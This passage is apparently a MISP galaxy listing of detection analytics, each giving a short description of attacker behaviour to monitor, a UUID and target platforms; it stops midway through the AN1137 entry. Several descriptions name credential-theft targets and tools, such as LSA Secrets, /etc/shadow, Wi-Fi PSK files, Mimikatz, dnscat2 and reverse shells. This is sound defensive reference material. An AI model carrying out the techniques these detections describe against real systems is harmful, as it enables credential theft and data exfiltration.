Recurring network exfiltration initiated by scheduled or script-based processes exhibiting time-based regularity and consistent external destinations.

Internal MISP references

UUID 79600919-afe8-4ac9-946c-147d85af6cfe which can be used as unique global reference for Analytic 1118 - AN1118 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1118
mitre_platforms ['Windows']

Analytic 1811 - AN1811

Network service scanning can be difficult to detect, and therefore enterprises may be better served focusing on detection at other stages of adversarial behavior.

Internal MISP references

UUID 9eeb7425-6979-4f77-aa7c-f9b0fe6b710e which can be used as unique global reference for Analytic 1811 - AN1811 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1811
mitre_platforms ['iOS']

Analytic 1119 - AN1119

Detection of cron-based or script-based recurring transfers where the same script, user, or destination reappears at predictable intervals.

Internal MISP references

UUID 11ac52fe-f8e0-4748-9fbc-2f85c43ad506 which can be used as unique global reference for Analytic 1119 - AN1119 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1119
mitre_platforms ['Linux']

Analytic 1191 - AN1191

Detects user agents or background services making unauthorized or unscheduled web API calls to cloud/web services over HTTPS.

Internal MISP references

UUID aff88199-cad0-47f8-b065-0ad7a86ec8a7 which can be used as unique global reference for Analytic 1191 - AN1191 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1191
mitre_platforms ['macOS']

Analytic 1221 - AN1221

Detects the creation, modification, or deletion of scheduled tasks through Task Scheduler, WMI, PowerShell, or API-based methods followed by execution from svchost.exe or taskeng.exe. Includes detection of hidden or anomalous scheduled tasks, especially those created under SYSTEM or suspicious user contexts.

Internal MISP references

UUID 4959f750-78db-4b4c-8d91-23027b386c2b which can be used as unique global reference for Analytic 1221 - AN1221 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1221
mitre_platforms ['Windows']

Analytic 1212 - AN1212

Detects adversary activity aimed at accessing LSA Secrets, including registry key export of HKEY_LOCAL_MACHINE\SECURITY\Policy\Secrets or memory scraping via tools such as Mimikatz or PowerSploit's Invoke-Mimikatz.

Internal MISP references

UUID a29288f5-c5d8-4e2d-8370-c4e21a64fc95 which can be used as unique global reference for Analytic 1212 - AN1212 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1212
mitre_platforms ['Windows']

Analytic 1122 - AN1122

Detects local daemons or scripts generating outbound DNS queries with long or frequent subdomains, indicative of DNS tunneling via tools like iodine, dnscat2, or dig from cronjobs or reverse shells.

Internal MISP references

UUID cc8183e1-9de4-469a-9117-79bf2e986e31 which can be used as unique global reference for Analytic 1122 - AN1122 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1122
mitre_platforms ['Linux']

Analytic 1132 - AN1132

Unauthorized mirroring sessions initiated on routers/switches (e.g., via monitor session, mirror port) coupled with outbound traffic from mirrored interface to unexpected destinations.

Internal MISP references

UUID 0729dd54-2fda-460a-8bb3-eee02f0f3c4e which can be used as unique global reference for Analytic 1132 - AN1132 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1132
mitre_platforms ['Network Devices']

Analytic 1312 - AN1312

Correlates unusual auto-forwarding rule creation via Exchange Web Services or Outlook rules engine, presence of X-MS-Exchange-Organization-AutoForwarded headers, and logon session anomalies from abnormal IPs.

Internal MISP references

UUID 2faaefb9-7816-4eb5-a9f5-b4006c99c20b which can be used as unique global reference for Analytic 1312 - AN1312 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1312
mitre_platforms ['Office Suite']

Analytic 1213 - AN1213

Detects suspicious custom compression/encryption routines through anomalous script or binary execution that produces high-entropy files without standard archiving utilities. Correlates script execution, memory API usage (bitwise ops, CryptoAPI calls), and creation of archive-like files with uncommon headers.

Internal MISP references

UUID 3f47f3e9-2856-4830-9762-7ca0c3924f6d which can be used as unique global reference for Analytic 1213 - AN1213 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1213
mitre_platforms ['Windows']

Analytic 1123 - AN1123

Detects scripting environments (AppleScript, osascript, curl) or non-native tools performing DNS queries with encoded subdomains, often used for data exfiltration or beaconing.

Internal MISP references

UUID 42a8c7a7-2773-4892-b647-40d3542ae4d2 which can be used as unique global reference for Analytic 1123 - AN1123 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1123
mitre_platforms ['macOS']

Analytic 1321 - AN1321

Detects tampering of IIS-based login pages (e.g., default.aspx, login.aspx) tied to VPN, OWA, or SharePoint via script injection or unexpected editor processes modifying web roots.

Internal MISP references

UUID 4f33b538-1370-4df1-934f-fe3a609453fb which can be used as unique global reference for Analytic 1321 - AN1321 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1321
mitre_platforms ['Windows']

Analytic 1231 - AN1231

AppleScript, LaunchAgents, or remote login services (ssh, networksetup) establishing proxy tunnels or dynamic port forwards to external IPs or alternate local hosts.

Internal MISP references

UUID aace8c0e-4534-432b-9a84-6e01c19570b7 which can be used as unique global reference for Analytic 1231 - AN1231 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1231
mitre_platforms ['macOS']

Analytic 1421 - AN1421

Detects use of vulnerable kernel extensions or entitlements abused via setuid or AppleScript injection chains.

Internal MISP references

UUID 0066bac9-599a-4f7b-a667-9cb1dca94347 which can be used as unique global reference for Analytic 1421 - AN1421 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1421
mitre_platforms ['macOS']

Analytic 1214 - AN1214

Detects custom archive routines by correlating script execution (Python, Perl, Bash) with creation of high-entropy files in temporary or user directories. Flags processes performing unusual bitwise operations or writing files without standard compression headers.

Internal MISP references

UUID 32ca8e2c-9c1e-4883-aa98-439efbfc76e4 which can be used as unique global reference for Analytic 1214 - AN1214 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1214
mitre_platforms ['Linux']

Analytic 1142 - AN1142

Command-line initiated UDP traffic bursts to external reflection amplification ports using built-in scripting or binaries with network anomalies

Internal MISP references

UUID 44c2e32e-bd34-4ba9-8105-28c14309207c which can be used as unique global reference for Analytic 1142 - AN1142 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1142
mitre_platforms ['macOS']

Analytic 1412 - AN1412

Adversary attaches USB drive and accesses sensitive files using Finder, cp, or bash scripts.

Internal MISP references

UUID 9abfb75c-2051-4549-b458-f09c4e6f4ad3 which can be used as unique global reference for Analytic 1412 - AN1412 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1412
mitre_platforms ['macOS']

Analytic 1241 - AN1241

Detects the redirection of syscall execution flow via modification of VDSO code stubs or GOT entries to load and execute a malicious shared object through mmap and ptrace.

Internal MISP references

UUID bfc7e981-ca7e-4b1b-a692-65a8867a7a89 which can be used as unique global reference for Analytic 1241 - AN1241 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1241
mitre_platforms ['Linux']

Analytic 1124 - AN1124

Detects clients issuing DNS queries with high volume, long subdomain lengths, encoded payload patterns, or to known malicious infrastructure; indicative of DNS-based C2 channels.

Internal MISP references

UUID fe648823-66c8-4cc3-8a8e-38616194464c which can be used as unique global reference for Analytic 1124 - AN1124 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1124
mitre_platforms ['Network Devices']

Analytic 1251 - AN1251

Detects suspicious changes to macOS authorization and PAM plugin files. Correlates file modifications under /etc/pam.d/ or /Library/Security/SecurityAgentPlugins with unexpected authentication attempts or anomalous account usage.

Internal MISP references

UUID 04cd1c76-d01d-482c-83e2-4bb5109e9764 which can be used as unique global reference for Analytic 1251 - AN1251 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1251
mitre_platforms ['macOS']

Analytic 1125 - AN1125

Detects unusual outbound DNS traffic from ESXi hosts, often from shell scripts, custom daemons, or malicious VIBs interacting with external DNS infrastructure outside the management plane.

Internal MISP references

UUID 11d8dd9d-e8f3-40cd-b9fe-cc82b6c2e790 which can be used as unique global reference for Analytic 1125 - AN1125 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1125
mitre_platforms ['ESXi']

Analytic 1215 - AN1215

Detects custom archiving by monitoring execution of Swift/Objective-C apps or scripts producing high-entropy files with non-standard headers. Correlates unified logs of abnormal NSFileHandle/NSData operations, memory use of XOR/bitwise operations, and file creation events.

Internal MISP references

UUID 1a39005f-28e7-4b07-85e2-14ffa0f6ea3b which can be used as unique global reference for Analytic 1215 - AN1215 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1215
mitre_platforms ['macOS']

Analytic 1152 - AN1152

Monitor VM-level DNS and network traffic logs for adversary-controlled domains or selective response behavior (e.g., dropped requests from security scanners).

Internal MISP references

UUID 4b16cb6e-7a81-4f97-a4ad-5e461e1cc154 which can be used as unique global reference for Analytic 1152 - AN1152 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1152
mitre_platforms ['ESXi']

Analytic 1521 - AN1521

Series of authentication failures (Event ID 4625) targeting the same or similar user accounts over time from one or more remote IPs

Internal MISP references

UUID 52dfd8de-910a-4caa-98a7-6dcf44ef903e which can be used as unique global reference for Analytic 1521 - AN1521 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1521
mitre_platforms ['Windows']

Analytic 1512 - AN1512

Processes (tar, curl, python scripts) accessing large file sets and initiating outbound HTTPS POST requests with payload sizes inconsistent with baseline activity. Defender perspective: detect abnormal sequence of file archival followed by encrypted uploads to external web services.

Internal MISP references

UUID 8a5a1b1e-336f-41af-8f30-2fa7e8e10fab which can be used as unique global reference for Analytic 1512 - AN1512 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1512
mitre_platforms ['Linux']

Analytic 1621 - AN1621

Detects enabling of reversible password encryption in Active Directory or Group Policy, suspicious PowerShell commands modifying AD user properties, and unusual account configuration changes correlated with policy modifications. Multi-event correlation links Group Policy edits, PowerShell command execution, and user account property changes to identify tampering with authentication encryption settings.

Internal MISP references

UUID 105ca36e-c3e0-48c4-ada3-7f8c4aa4430f which can be used as unique global reference for Analytic 1621 - AN1621 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1621
mitre_platforms ['Windows']

Analytic 1216 - AN1216

Detects the relocation of malicious executables via copy/move actions across suspicious folders (e.g., from Downloads to System32), followed by deletion of the original source or renaming to blend into legitimate binaries.

Internal MISP references

UUID 143f3057-237e-427f-911a-2aa7d64721f0 which can be used as unique global reference for Analytic 1216 - AN1216 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1216
mitre_platforms ['Windows']

Analytic 1162 - AN1162

Abuse of SaaS platforms such as Confluence, GitHub, SharePoint Online, or Slack to access excessive internal documentation or export source code/data. Includes use of tokens or browser automation from unapproved IPs.

Internal MISP references

UUID 3655f892-ed0d-4b76-9173-ecb7eebacd8a which can be used as unique global reference for Analytic 1162 - AN1162 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1162
mitre_platforms ['SaaS']

Analytic 1126 - AN1126

Creation or modification of .plist files in /Library/LaunchDaemons/, especially those with suspicious Program or ProgramArguments paths, combined with execution activity under launchd with elevated privileges. Detectable through correlated Unified Logs, file monitoring, and process telemetry.

Internal MISP references

UUID 4bb5b68e-1a01-498e-ae39-94f951e01cd9 which can be used as unique global reference for Analytic 1126 - AN1126 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1126
mitre_platforms ['macOS']

Analytic 1612 - AN1612

Detection of suspicious enumeration of local or domain accounts via command-line tools, WMI, or scripts.

Internal MISP references

UUID e576eaeb-2158-40f9-8edb-c119eac56442 which can be used as unique global reference for Analytic 1612 - AN1612 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1612
mitre_platforms ['Windows']

Analytic 1261 - AN1261

Detection of container image build activity directly on the host using Docker or Kubernetes APIs. Defenders may observe Docker build requests, anomalous Dockerfile instructions (such as downloading code from unknown IPs), or creation of new images followed by immediate deployment. This behavior chain typically consists of an unexpected image creation event correlated with outbound network communication to non-standard or untrusted destinations.

Internal MISP references

UUID f568a973-fb34-41aa-950f-f46457544564 which can be used as unique global reference for Analytic 1261 - AN1261 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1261
mitre_platforms ['Containers']

Analytic 1217 - AN1217

Detects binary movement or copying between untrusted and trusted paths (e.g., /tmp/ → /usr/bin/ or /etc/init.d/) that may indicate persistence attempts or cleanup of origin traces.

Internal MISP references

UUID 39aa9168-6f3b-4179-84f9-a6b8dcf90900 which can be used as unique global reference for Analytic 1217 - AN1217 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1217
mitre_platforms ['Linux']

Analytic 1172 - AN1172

Detects file movement or outbound TFTP/FTP transfers from ESXi host initiated via shell commands or injected scripts, particularly from scratch partitions or /tmp.

Internal MISP references

UUID 61e3802a-c95c-43c2-8749-139e0f750169 which can be used as unique global reference for Analytic 1172 - AN1172 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1172
mitre_platforms ['ESXi']

Analytic 1271 - AN1271

Anomalous creation or mounting of hidden partitions or virtual file systems. Defender view: detection of registry modifications linked to non-standard file systems, suspicious disk I/O patterns, or bootkit-like behavior where hidden volumes are accessed outside normal file system APIs.

Internal MISP references

UUID 8d7fb300-189d-4654-ba66-3612a8a4cf65 which can be used as unique global reference for Analytic 1271 - AN1271 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1271
mitre_platforms ['Windows']

Analytic 1127 - AN1127

Unusual enumeration of services and resources through cloud APIs such as AWS CLI describe-*, Azure Resource Manager queries, or GCP project listings. Defender perspective includes anomalous API calls, unexpected volume of service enumeration, and correlation of discovery with recently compromised sessions.

Internal MISP references

UUID fe8c1ef5-59ed-40c3-b7f6-eb560555ee22 which can be used as unique global reference for Analytic 1127 - AN1127 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1127
mitre_platforms ['IaaS']

Analytic 1721 - AN1721

Application vetting services could look for known software packers or artifacts of packing techniques. Packing is not a definitive indicator of malicious activity, because as legitimate software may use packing techniques to reduce binary size or to protect proprietary code.

Internal MISP references

UUID 75a0da5c-9f2b-4e96-bb94-10c30f16a9a2 which can be used as unique global reference for Analytic 1721 - AN1721 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1721
mitre_platforms ['iOS']

Analytic 1712 - AN1712

Mobile security products can detect which applications can request device administrator permissions. Application vetting services could be extra scrutinous of applications that request device administrator permissions. The user can view applications with administrator access through the device settings, and may also notice if user data is inexplicably missing.

Internal MISP references

UUID f6be418e-3fed-4026-b665-f055465c7359 which can be used as unique global reference for Analytic 1712 - AN1712 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1712
mitre_platforms ['Android']

Analytic 1281 - AN1281

File access to NetworkManager connection configs and attempts to read PSK credentials from /etc/NetworkManager/system-connections/*.

Internal MISP references

UUID 1f3a6d61-9658-4c9b-92af-5c711206e3fa which can be used as unique global reference for Analytic 1281 - AN1281 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1281
mitre_platforms ['Linux']

Analytic 1182 - AN1182

Process execution that probes user activity artifacts (e.g., desktop files, registry history) following recent user login/unlock events.

Internal MISP references

UUID 5bd6658f-4391-4d77-bed8-9b141b0fa3ae which can be used as unique global reference for Analytic 1182 - AN1182 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1182
mitre_platforms ['Windows']

Analytic 1218 - AN1218

Detects movement of binaries to ~/Library/, /System/, or app bundle locations, especially after initial execution or download from Safari or Mail.

Internal MISP references

UUID 72540cd1-3ba6-4a4a-8866-a3113094196a which can be used as unique global reference for Analytic 1218 - AN1218 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1218
mitre_platforms ['macOS']

Analytic 1128 - AN1128

Enumeration of directories, applications, or service principals through APIs such as Microsoft Graph or Okta API. Defender perspective includes unexpected listing of users, roles, applications, and abnormal access to identity management endpoints.

Internal MISP references

UUID e2dd9fee-91b7-4e32-8031-69ed4d7b927c which can be used as unique global reference for Analytic 1128 - AN1128 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1128
mitre_platforms ['Identity Provider']

Analytic 1821 - AN1821

Google sends a notification to the device when Android Device Manager is used to locate it. Additionally, Google provides the ability for users to view their general account activity and alerts users when their credentials have been used on a new device. Apple iCloud also provides notifications to users of account activity such as when credentials have been used.

Internal MISP references

UUID 6e3a93db-d2a6-43b7-9aa6-4dcf972f5e53 which can be used as unique global reference for Analytic 1821 - AN1821 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1821
mitre_platforms ['iOS']

Analytic 1812 - AN1812

Application vetting services can look for applications requesting the permissions granting access to accessibility services or application overlay. The user can view a list of device administrators and applications that have registered Accessibility services in device settings. Applications that register an Accessibility service should be scrutinized further for malicious behavior.

Internal MISP references

UUID 7d2231b0-d62e-4d5f-bc26-99e7f14ec741 which can be used as unique global reference for Analytic 1812 - AN1812 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1812
mitre_platforms ['Android']

Analytic 1291 - AN1291

Detects rogue DHCP activity by monitoring syslog for dhclient messages assigning unauthorized DNS/gateway values. Packet capture or IDS can detect multiple competing DHCP OFFERs from non-authorized servers.

Internal MISP references

UUID 05d8ce15-eaeb-47f5-abb7-8f8868dd8aaa which can be used as unique global reference for Analytic 1291 - AN1291 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1291
mitre_platforms ['Linux']

Analytic 1129 - AN1129

Discovery of SaaS services connected to productivity platforms (e.g., Microsoft 365, Google Workspace). Defender perspective includes unexpected enumeration of enabled services, API integrations, or OAuth applications tied to user accounts.

Internal MISP references

UUID 19b6de3a-032f-4dc8-aa72-7cd952dfed59 which can be used as unique global reference for Analytic 1129 - AN1129 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1129
mitre_platforms ['Office Suite']

Analytic 1219 - AN1219

Detects firmware or script relocation attempts (e.g., CLI-based copy, move, or rename) between temporary partitions and config startup folders on routers or switches.

Internal MISP references

UUID 6b8a97fe-4e51-4409-9eab-f2795eb2ec74 which can be used as unique global reference for Analytic 1219 - AN1219 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1219
mitre_platforms ['Network Devices']

Analytic 1192 - AN1192

Detects guest VMs or management agents issuing HTTP(S) traffic to external services without a valid patch management or backup justification.

Internal MISP references

UUID 900bc498-4b81-43b6-bec2-3b55edc5c0ff which can be used as unique global reference for Analytic 1192 - AN1192 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1192
mitre_platforms ['ESXi']

Analytic 1331 - AN1331

Identify repeated DNS resolutions where the same domain name returns multiple IPs in short succession, combined with low TTL values and high query volume from unusual processes. Correlate with process lineage (e.g., Office apps spawning abnormal DNS lookups).

Internal MISP references

UUID 7e6e9c0e-737e-43ac-8cdd-5edbff4d6424 which can be used as unique global reference for Analytic 1331 - AN1331 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1331
mitre_platforms ['Windows']

Analytic 1313 - AN1313

Adversaries using WinRM to remotely execute commands, launch child processes, or access WMI. The detection chain includes service use, network activity, remote session logon, and process creation within a short temporal window.

Internal MISP references

UUID 9dab17bf-62c7-4187-90f4-7335790df7c0 which can be used as unique global reference for Analytic 1313 - AN1313 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1313
mitre_platforms ['Windows']

Analytic 1133 - AN1133

Monitor Windows Registry modifications to Winlogon keys (Shell, Userinit, Notify) that introduce new executable or DLL paths. Correlate these changes with subsequent DLL loading, image loads, or process creation originating from winlogon.exe or userinit.exe. Abnormal child process lineage or unauthorized binaries in C:\Windows\System32 may indicate abuse.

Internal MISP references

UUID e8569cdc-a018-4eee-95d9-5979cebae519 which can be used as unique global reference for Analytic 1133 - AN1133 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1133
mitre_platforms ['Windows']

Analytic 1143 - AN1143

Cloud-hosted VM or container generates spoofed UDP requests to third-party services on known amplifier ports, with high outbound-to-inbound traffic ratios in VPC Flow Logs

Internal MISP references

UUID 08c69003-044c-46a5-b17a-7cb5b25f2d50 which can be used as unique global reference for Analytic 1143 - AN1143 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1143
mitre_platforms ['IaaS']

Analytic 1134 - AN1134

Correlates LNK file execution with embedded resource extraction or suspicious network activity following initial launch, often leading to payload delivery via disguised icons.

Internal MISP references

UUID 11dd0dbf-e880-43d2-99f7-4b6bf9d821fa which can be used as unique global reference for Analytic 1134 - AN1134 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1134
mitre_platforms ['Windows']

Analytic 1431 - AN1431

Detects use of 'esxcli system' or direct interpreter commands (e.g., busybox shell) invoked from SSH or host terminal unexpectedly.

Internal MISP references

UUID 533d13df-5317-45dd-a544-c26d0192d6b2 which can be used as unique global reference for Analytic 1431 - AN1431 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1431
mitre_platforms ['ESXi']

Analytic 1413 - AN1413

Detects non-browser processes that establish encrypted outbound connections (e.g., TLS/SSL) to unfamiliar or atypical destinations for the host/user, following a data staging or compression event.

Internal MISP references

UUID 6869578d-d3e8-4a3c-9717-0a188dc0bafe which can be used as unique global reference for Analytic 1413 - AN1413 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1413
mitre_platforms ['Windows']

Analytic 1341 - AN1341

Repeated failed authentication attempts to container APIs, control planes, or login shells across many user names using same password

Internal MISP references

UUID 70500794-7d3d-4538-8e88-ed6d5e998a8a which can be used as unique global reference for Analytic 1341 - AN1341 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1341
mitre_platforms ['Containers']

Analytic 1314 - AN1314

Cause→effect chain: (1) User-facing app (Office/PDF/archiver/browser) records an open/click or abnormal event, then (2) a downloaded file is created in a user-writable path and/or decompressed, (3) the parent user app spawns a living-off-the-land binary (e.g., powershell/cmd/mshta/rundll32/msiexec/wscript/expand/zip) or installer, and (4) immediate outbound HTTP(S)/DNS/SMB from the same lineage.

Internal MISP references

UUID dcd6253b-a986-4c8a-bd89-46389007ea83 which can be used as unique global reference for Analytic 1314 - AN1314 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1314
mitre_platforms ['Windows']

Analytic 1531 - AN1531

Detection of non-interactive or suspicious processes accessing Bluetooth interfaces and transmitting outbound traffic following file access or staging activity.

Internal MISP references

UUID 02fb4d83-d2db-4d49-acbc-85eff3b517d6 which can be used as unique global reference for Analytic 1531 - AN1531 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1531
mitre_platforms ['Windows']

Analytic 1351 - AN1351

A process explicitly forges its parent using EXTENDED_STARTUPINFO + PROC_THREAD_ATTRIBUTE_PARENT_PROCESS (UpdateProcThreadAttribute → CreateProcess[A/W]/CreateProcessAsUserW) or other Native API paths, resulting in mismatched/implausible lineage across ETW EventHeader ProcessId, Security 4688 Creator Process ID/Name, and sysmon ParentProcessGuid. Often paired with privilege escalation when the chosen parent runs as SYSTEM.

Internal MISP references

UUID 312f9f86-b987-483c-8b1d-955415eea946 which can be used as unique global reference for Analytic 1351 - AN1351 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1351
mitre_platforms ['Windows']

Analytic 1315 - AN1315

Cause→effect chain: (1) User app/browser/archiver logs an open/click or abnormal exit, (2) new executable/script/archive extracted into $HOME/Downloads, /tmp, or ~/.cache, (3) parent app spawns shell/interpreter (bash/sh/python/node/curl/wget) or desktop file, and (4) new outbound connection(s) from the child lineage.

Internal MISP references

UUID a6e7697d-f0b8-4fcc-b32a-fec5b28cd8f7 which can be used as unique global reference for Analytic 1315 - AN1315 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1315
mitre_platforms ['Linux']

Analytic 1513 - AN1513

Office apps or scripts writing files followed by xattr manipulation (to evade quarantine) and subsequent HTTPS uploads. Defender perspective: anomalous file modification + outbound TLS traffic originating from non-networking apps (Word, Excel, Preview).

Internal MISP references

UUID d49c13ed-df07-4bb3-a2dc-43411e5d402a which can be used as unique global reference for Analytic 1513 - AN1513 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1513
mitre_platforms ['macOS']

Analytic 1153 - AN1153

Unusual access to bash history, registry credentials paths, or private key files by unauthorized or scripting tools, with correlated file and process activity.

Internal MISP references

UUID d76081f4-26cd-4e62-91e8-4e4a3992dd90 which can be used as unique global reference for Analytic 1153 - AN1153 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1153
mitre_platforms ['Windows']

Analytic 1135 - AN1135

Abuse of extended attributes (xattrs) to embed hidden payloads into legitimate files. Defender perspective: detect anomalous use of setfattr or getfattr commands, or direct syscalls (setxattr, getxattr) where attributes are unusually large or contain encoded data. Behavior chain includes: (1) execution of setfattr with suspicious namespaces (user., trusted.), (2) file metadata modification inconsistent with file size/hash, and (3) subsequent process execution reading attributes followed by decoding activity.

Internal MISP references

UUID f398e8ff-8c61-4672-8ace-118b11a38515 which can be used as unique global reference for Analytic 1135 - AN1135 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1135
mitre_platforms ['Linux']

Analytic 1316 - AN1316

Cause→effect chain: (1) unified logs show application open/click or crash for Safari/Chrome/Office/Preview/archiver, (2) file write/extraction into ~/Downloads, /private/var/folders/* or ~/Library, (3) parent app spawns osascript/bash/zsh/curl/python or opens a quarantined app with Gatekeeper prompts, (4) network egress from child.

Internal MISP references

UUID 66107cd1-c123-4ad5-bb0b-62d8a9a451a6 which can be used as unique global reference for Analytic 1316 - AN1316 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1316
mitre_platforms ['macOS']

Analytic 1613 - AN1613

Enumeration of users and groups through suspicious shell commands or unauthorized access to /etc/passwd or /etc/shadow.

Internal MISP references

UUID 7b0d80c0-807e-46b1-b3f7-fd3e4f3aceba which can be used as unique global reference for Analytic 1613 - AN1613 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1613
mitre_platforms ['Linux']

Analytic 1631 - AN1631

Monitoring adversary access to sensitive process memory via the /proc filesystem to extract credential material, often involving multi-step access to /proc/[pid]/mem or /proc/[pid]/maps combined with privilege escalation or credential scraping binaries.

Internal MISP references

UUID 98b71f96-ae0a-47b4-bec2-156cb6e5bfcb which can be used as unique global reference for Analytic 1631 - AN1631 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1631
mitre_platforms ['Linux']

Analytic 1163 - AN1163

Access of mounted cloud shares or document repositories via browser, terminal, or Finder by users not typically interacting with those resources. Includes script-based enumeration or mass download.

Internal MISP references

UUID eac7b88d-0ee2-4fbf-9e0b-ea73c376ccb3 which can be used as unique global reference for Analytic 1163 - AN1163 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1163
mitre_platforms ['macOS']

Analytic 1361 - AN1361

Monitor for anomalous access to financial applications, browser-based banking sessions, or enterprise ERP systems from Windows endpoints. Detect mass emailing of payment instructions, sudden rule changes in Outlook for financial staff, or use of clipboard data exfiltration tied to cryptocurrency wallet addresses.

Internal MISP references

UUID f2aef85a-c1ea-4d1a-b359-32692c973cdc which can be used as unique global reference for Analytic 1361 - AN1361 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1361
mitre_platforms ['Windows']

Analytic 1136 - AN1136

Abuse of extended attributes (xattrs) to hide payloads in com.apple. or custom keys. Defender perspective: monitor suspicious use of xattr command with -w (write) and -p (print) flags, especially when followed by execution of interpreters like bash, Python, or osascript. Behavior chain includes: (1) suspicious file modification with new com.apple. attributes, (2) attribute content inconsistent with expected metadata tags (e.g., high entropy), (3) subsequent process execution correlated with extraction of the attribute.

Internal MISP references

UUID f5a0dc9d-3dda-4e31-ad4d-0560b918b6b1 which can be used as unique global reference for Analytic 1136 - AN1136 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1136
mitre_platforms ['macOS']

Analytic 1317 - AN1317

Cause→effect chain in CI/dev desktops: (1) user triggers container run/pull after opening a doc/link/script, (2) newly created image/container uses unexpected external registry or entrypoint, (3) container starts and immediately egresses to suspicious destinations.

Internal MISP references

UUID 3a6fdd1a-59c6-4f46-a761-0de502229da0 which can be used as unique global reference for Analytic 1317 - AN1317 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1317
mitre_platforms ['Containers']

Analytic 1137 - AN1137

Detects anomalous usage of local accounts to log into a system, especially accounts not typically used interactively or outside business hours.

Internal MISP references

